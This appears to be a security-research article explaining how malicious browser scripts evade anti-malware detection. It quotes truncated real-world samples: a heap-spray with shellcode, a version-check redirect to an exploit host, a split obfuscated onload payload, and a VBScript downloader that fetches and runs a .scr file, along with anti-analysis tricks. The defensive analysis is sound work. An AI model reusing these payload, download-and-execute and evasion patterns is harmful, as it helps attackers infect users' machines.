Академический Документы
Профессиональный Документы
Культура Документы
Introduction
Web is the predominant infection vector today with over 70 percent of attacks happening
over the web. Large presence of unpatched browsers and browser plug-ins provide very
good attack success ratios. Client side scripts embedded in web pages tend to be the
major enablers of these attacks. As anti malware industry steps up its effort to protect
against these malicious scripts, they are turning very innovative in their delivery,
obfuscation and evasion techniques.
function Check()
{
var shellcode1 =
unescape("%u9090%u6090%u17eb%u645e%u30a1%u0000"+"%u0500%u0800%u0000%uf88b.
………………………………………………………………………………………………………………..
e61%u3633%u2e30%u6f63%u2f6d%u7230%u326c%u652e%u6578%u0000");
var bigblock=unescape("%u0C0C%u0C0C");
var headersize=20;
var slackspace=headersize+shellcode1.length;
while(bigblock.length<slackspace)
bigblock+=bigblock;
var fillblock=bigblock.substring(0,slackspace);
var block=bigblock.substring(0,bigblock.length-slackspace);
while(block.length+slackspace < 0x40000)
block=block+block+fillblock;
var memory=new Array();
for(i=0; i<400; i++) {
memory[i] = block+shellcode1
}
Var buf =”;
While(buf.length<32)
Buf=buf+unescape(“%0C”);
Var m=”;
M=obj;
Console;
Obj.Console=buf;
Obj.Console=m;
M=obj.Console;
Obj.Console=buf;
Obj.Console=m
}
Typically such a script found in the wild is super obfuscated as a first level of defense
from detection. Scripts employ several techniques on top of this to evade detection even
after decryption.
There are several shellcode encryptors available with anti static and dynamic analysis
which will prevent easy identification of shellcode elements in the script. The ascii
encoded shellcodes like alpha family makes the task even more difficult because of false
positive concerns.
The rest of the code as we can see is dynamic code which allows making pattern
identification very challenging. Dynamic script generation using DOM document class is
another method actively used by attacks in the wild to evade detection. Such techniques
are effective in wearing down the detection logic and also effective in throwing off
heurists that determine if code is decrypted.
document.writeln("<SCRIPT language=\"JavaScript\">");
document.writeln("var goodflow = \"%u9090%u6090\") ;
document.writeln("\"%u17eb%u645e%u30a1%u0000\" +");……….
document.writeln("</SCRIPT">");
Distributed Scripts
function CheckAndRedirect() {
var user = navigator.userAgent.toLowerCase();
RealVersion = Real.PlayerProperty("PRODUCTVERSION");
if(RealVersion.indexOf("6.0.10.") != -1)
Exploit = 1
……..
Switch (Exploit) {
Case 1:
Location.href = http://malfake.cn/exp1.htm;
Break;
……………..
}
}
3. Exploit Splitting
Many types of exploit splitting can be seen in the wild to evade detection. Using multiple
script sections, splitting between remote js files and embedded html, passing shellcode as
parameter to an event trigger are some of them. Following snippet from a real world
sample uses a bloated onload event parameter for splitting.
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script type="text/javascript">
function ubYc37hHe(hvc3y5y7g, B32DS636x){var Ae6Jhd3a0 = arguments.callee;var
bNdsR3Fm2 = location.href;Ae6Jhd3a0 = Ae6Jhd3a0.toString();Ae6Jhd3a0 =
A6e85797e926d797a7079846F687678896E77799d6868797a6d747a6b686A787a6e7779
…………………………………………………………………………………………….
89A56f68687b7c79767c7B737879787075856b736A7B8699757c7B696b8389707D847e
727577A9797b7c696969837D6F747B7F92977B7B6DA77a6B6665768B98A8779f6664
696e72');
</script>
</head>
<body
onload="ubYc37hHe('97a9b0a8ABADB2a751a17989AC77AA6f83a86Aa6887b8a71a2
80B4796364B68663A6a3AA83959a62ACAAa3B7579D76a063688E8E7cBB63765195
B……………………………………………………………………………………………
707D847e727577A9797b7c696969837D6F747B7F92977B7B6DA77a6B6665768B98A
8779f6664696e72')">
</body>
</html>
Multilingual Scripts
A class of JavaScript attacks that dynamically write exploit script block in another
scripting language (like vb script) is seen in the wild. This can easily throw off JavaScript
analyzers in anti malware engines.
<script LANGUAGE="Javascript">
document.write(unescape("%0D%0A%3Cscript%20language%3D%22VBScript
%22%3E%0D%0A%0D%0A%20%20%20%20on%20error%20resume%20next%0D%0
A%0D%0A%20%20%20%20%0D%0A%0D%0A%20%20 ...
D%0A%0D%0A%20%20%20%20%3C/script%3E%0D%0A%3C/html%3E"));
</script>
Code like this gets transformed into the following XML exploit in vbscript .
<script language="VBScript">
dl = "http://foto02122006.xxx.ru/foto.scr"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"") S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
Additional back and forth transformations can also be seen in the wild.
1. Function Redefinitions
One typical technique analysis engines do is replace interesting functions like eval to
common debugging functions like print. Outputs from these functions provide
significantly less complex code for analysis. In most cases it might render completely
decrypted JavaScript code. JavaScript allows for redefinition of functions within the
script body. Many malicious scripts redefine debugging functions like print to local script
functions as an anti analysis technique. The alert in the code below results in exiting the
script.
<script>
var str="alpanert";
var str2=str.replace("pan","");
str2 = quit;
alert(str2);
</script>
<script>
a && bi; function asd2 () {alert("two");}
</script>
<script>
asd = asd2; asd();
</script>
<script>
var loaded_image = 0;
function image_set() { loaded_image = 1; }
function do_mal { if (loaded_image == 1) malicious…….}
</script>
<img src=‘http//foooo//check.jpg’ onload=“image_set();”>